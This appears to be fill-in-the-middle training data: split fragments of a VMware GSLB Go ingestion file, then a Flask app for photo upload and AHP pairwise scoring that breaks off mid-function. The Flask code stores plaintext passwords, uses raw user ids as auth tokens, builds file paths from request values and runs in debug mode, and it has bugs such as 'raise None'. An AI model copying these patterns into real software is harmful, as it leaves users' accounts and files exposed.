gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) { | }
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
} | gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return | random_line_split |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func getObjFromStore(objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) |
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
} | conditional_block |
dq_ingestion.go | /*
* Copyright 2019-2020 VMware, Inc.
* All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package nodes
import (
"errors"
"sync"
"github.com/davecgh/go-spew/spew"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/gslbutils"
"github.com/vmware/global-load-balancing-services-for-kubernetes/gslb/k8sobjects"
"github.com/vmware/load-balancer-and-ingress-services-for-kubernetes/pkg/utils"
)
func DeriveGSLBServiceName(hostname string) string {
// This function is a place-holder for deriving the GSLB service name
// For now, the hostname of a route is the GSLB Service name
return hostname
}
func PublishKeyToRestLayer(tenant, gsName, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func | (objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
}
switch objectOperation {
case gslbutils.ObjectAdd:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
case gslbutils.ObjectDelete:
deleteObjOperation(key, cname, ns, objType, objName, sharedQueue)
case gslbutils.ObjectUpdate:
AddUpdateObjOperation(key, cname, ns, objType, objName, sharedQueue, false, SharedAviGSGraphLister())
}
}
func SyncFromIngestionLayer(key string, wg *sync.WaitGroup) error {
DequeueIngestion(key)
return nil
}
| getObjFromStore | identifier_name |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit() | folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
